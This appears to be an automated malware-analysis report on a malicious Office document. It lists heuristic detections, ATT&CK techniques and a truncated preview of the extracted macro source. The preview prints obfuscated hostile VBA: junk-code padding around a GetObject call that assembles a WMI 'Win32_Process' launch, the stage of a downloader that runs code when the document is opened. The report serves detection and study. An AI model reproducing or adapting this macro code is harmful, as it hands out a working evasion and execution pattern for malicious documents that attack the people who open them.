MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OLE document with a high-risk anomaly in its slack space and contains VBA macros, including an AutoOpen macro. The presence of an AutoOpen macro and the GetObject call strongly suggest the execution of malicious code upon opening. The VBA script itself is heavily obfuscated, making it difficult to determine the exact payload, but its structure implies it's designed to download and execute a second-stage artifact.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 158,766 bytes but its declared streams total only 86,610 bytes — 72,156 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41268 bytes |
SHA-256: a79f6054d5c0d65eb02a252f083ad7f1964106a1ecf501cfaa621e60bfb6bc2e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "a7880266"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "C840010"
Function s3148_()
Select Case R1566_
Case 516838731
m__285 = (j87807_8 * Fix(296178247 / CBool(o115_1))) - C13_37 / Oct(293393407) / 630377197 + CStr(I_558_23) - 660671192 + ChrB(X_19883)
End Select
Select Case p93_382
Case 77420656
i48054 = (Y1644314 * Fix(774667045 / CBool(f4349_))) - I52_120 / Oct(529354408) / 90262237 + CStr(i8450_) - 168691378 + ChrB(z___5_3)
End Select
Select Case u__60_8_
Case 30235116
U409_695 = (B490_4 * Fix(19556864 / CBool(Q392_258))) - D6_5_622 / Oct(728609941) / 106099904 + CStr(z70__30) - 733617483 + ChrB(i408_2_)
End Select
Select Case k670_6_
Case 647821167
i24_71 = (X8_800_4 * Fix(896535262 / CBool(J3__73))) - V__123 / Oct(319038763) / 336902251 + CStr(r21_55) - 571729712 + ChrB(n__87_)
End Select
Select Case O7_7_331
Case 162329689
I2_353 = (k_1_4_ * Fix(2283938 / CBool(J83_2_1_))) - H27426 / Oct(305651347) / 118717102 + CStr(d0_86__) - 272478045 + ChrB(h_06_988)
End Select
Select Case U_41__7
Case 698753536
k3_6382_ = (W_51400 * Fix(453048743 / CBool(v__89_06))) - X72467 / Oct(196484666) / 810741272 + CStr(f147387) - 282946352 + ChrB(K1____)
End Select
Select Case a__00_9
Case 203337892
j3921__ = (z__67_ * Fix(454390916 / CBool(p16_064))) - u18_5__ / Oct(268298586) / 543508811 + CStr(n57302_0) - 563238546 + ChrB(N91652_8)
End Select
End Function
Function l0_1__(o7_572_, Q__632__)
On Error Resume Next
Select Case M1__0_9
Case 49615010
M_7_311 = (H_4_28 * Fix(988689433 / CBool(K30484))) - T_88_99 / Oct(149282066) / 503026093 + CStr(z619690) - 592631230 + ChrB(m3087_)
End Select
Select Case Z678_9
Case 19993843
i_7952 = (k3_3_9 * Fix(413919346 / CBool(j73___))) - t2_0_168 / Oct(96083708) / 331985542 + CStr(n322_88_) - 917373509 + ChrB(D58_898_)
End Select
i253_50_ = X159_269 + "winmgmts:Win32" + s47661 + "_ProcessStartup" + M2_65_
Select Case i6_9945
Case 675298117
u34_959 = (k__5_51 * Fix(652825974 / CBool(v0140_))) - P_621_ / Oct(880846215) / 835072291 + CStr(l273__8) - 597682159 + ChrB(F59946)
End Select
Select Case P_3_4642
Case 723758910
E7__3_ = (d3_128 * Fix(150904099 / CBool(M36__0))) - o3886_ / Oct(513302008) / 694092139 + CStr(C_2854) - 619347939 + ChrB(b_24291)
End Select
Select Case I0____46
Case 678729379
m_15_35 = (j8306_ * Fix(580591602 / CBool(H1746_49))) - a517_148 / Oct(393622825) / 977817913 + CStr(f365085) - 465139037 + ChrB(X680_8)
End Select
j40_1__ = F965_0 + "winmgmts:Win32" + j373_5 + "_Process" + O_25_51
Select Case a608888_
Case 943495683
U_26_315 = (q08380_ * Fix(822252679 / CBool(V970_9_9))) - z818_45 / Oct(27061879) / 974788942 + CStr(M780_25) - 962437839 + ChrB(C__8_87)
End Select
Select Case z__1660
Case 777063855
z3984_3 = (P_4___ * Fix(598179275 / CBool(f59545))) - V065_8_ / Oct(106471359) / 909233529 + CStr(K_5125_) - 551170688 + ChrB(r2_693)
End Select
Select Case C_90_4_
Case 813565636
f52_22_ = (F33_2_2_ * Fix(76797393 / CBool(b__26043))) - Y03_138_ / Oct(284062389) / 174184373 + CStr(R_4__8) - 929465842 + ChrB(h272_51)
End Select
Set S04___ = GetObject(W57640 + i253_50_ + Q6___63)
Select Case D_25324
Case 657663429
Z_82793 = (G1__06 * Fix(120492041 / CBool(O__069))) - N_7299_ / Oct(382100021) / 960712356 + CStr(Q1660__5) - 226287301 + ChrB(w242699)
End Select
Select Case M_58__9
Case 933067159
C4_6_21 = (s_48_9 * Fix(795652300 / CBool(s868_0))) - H373770 / Oct(781117956) / 934453172 + CStr(V9_34__) - 791343344 + ChrB(X__991)
End Select
Select Case D59_03_
Case 539910223
Y361266 = (i_02_1_ * Fix(321892653 / CBool(F27__66))) - d6_176_7 / Oct(155155024) / 366
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.